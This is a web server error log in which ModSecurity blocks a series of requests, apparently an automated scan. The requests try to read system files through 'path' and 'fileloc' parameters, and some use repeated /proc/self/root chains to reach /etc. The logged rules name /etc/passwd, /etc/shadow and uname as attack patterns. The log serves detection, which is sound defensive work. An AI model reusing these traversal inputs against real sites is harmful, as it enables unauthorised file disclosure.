[Fri Mar 20 05:31:48.780827 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.34:58200] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9PqxLDW4GITHUkTFZwAAARM"]
[Fri Mar 20 05:31:49.207214 2026] [:error] [pid 10189:tid 140411649607424] [client 57.141.18.49:58228] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9TJ3M9BSuKP7CAb1rAAAAIs"]
[Fri Mar 20 05:31:49.499052 2026] [:error] [pid 11642:tid 140411691570944] [client 57.141.18.12:58252] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9bninkcc-iUj5ApBPgAAA4Y"]
[Fri Mar 20 05:31:50.040565 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.57:58288] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9hCii7xarUs8iHZJsgAAAgg"]
[Fri Mar 20 05:31:50.135366 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.20:58296] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9ta6ubjKNq_cu4a0CgAAA0Q"]
[Fri Mar 20 05:31:50.540265 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.123:58328] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9vqxLDW4GITHUkTFbQAAAQU"]
[Fri Mar 20 05:31:50.919091 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.32:58232] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9rninkcc-iUj5ApBRAAAA4k"]
[Fri Mar 20 05:31:50.983543 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:35078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F9rninkcc-iUj5ApBRQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:51.043004 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:45052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F9_qxLDW4GITHUkTFbgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:51.255581 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.114:58370] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9_HIg5MgXLBnicPcMwAAAcE"]
[Fri Mar 20 05:31:51.579123 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.8:58398] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9wF0L0L-SsrnPo5KfgAAAsU"]
[Fri Mar 20 05:31:52.136505 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.23:58434] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-AF0L0L-SsrnPo5KgAAAAsQ"]
[Fri Mar 20 05:31:52.141510 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.18:58436] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-AF0L0L-SsrnPo5KgQAAAsQ"]
[Fri Mar 20 05:31:52.476599 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:56762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F-BCii7xarUs8iHZJuAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:52.715555 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.105:58476] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-PqxLDW4GITHUkTFcQAAARg"]
[Fri Mar 20 05:31:52.991937 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.77:58498] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-DJ3M9BSuKP7CAb1rQAAAIQ"]
[Fri Mar 20 05:31:53.056639 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.63:58500] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-fqxLDW4GITHUkTFcgAAARI"]
[Fri Mar 20 05:31:53.912289 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.42:58558] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-fXLqtnMIWvjpaJ8xAAAAo8"]
[Fri Mar 20 05:31:54.122722 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.93:58578] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-vqxLDW4GITHUkTFdwAAAQw"]
[Fri Mar 20 05:31:54.302026 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.97:58586] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-vqxLDW4GITHUkTFeAAAARU"]
[Fri Mar 20 05:31:54.302720 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.97:58588] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-vqxLDW4GITHUkTFeQAAAQk"]
[Fri Mar 20 05:31:55.010278 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.101:58646] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-zJ3M9BSuKP7CAb1sAAAAIM"]
[Fri Mar 20 05:31:55.434769 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.75:58678] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F-_qxLDW4GITHUkTFfQAAARY"]
[Fri Mar 20 05:31:56.287575 2026] [:error] [pid 31215:tid 140411540502272] [client 57.141.18.62:58724] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_AF0L0L-SsrnPo5KhwAAAtg"]
[Fri Mar 20 05:31:56.495154 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.49:58738] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_AF0L0L-SsrnPo5KiQAAAs4"]
[Fri Mar 20 05:31:56.907813 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.62:58748] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_PqxLDW4GITHUkTFfwAAARE"]
[Fri Mar 20 05:31:57.250111 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.121:58760] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_fqxLDW4GITHUkTFgQAAAQw"]
[Fri Mar 20 05:31:57.928151 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.69:58750] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_fqxLDW4GITHUkTFgwAAARU"]
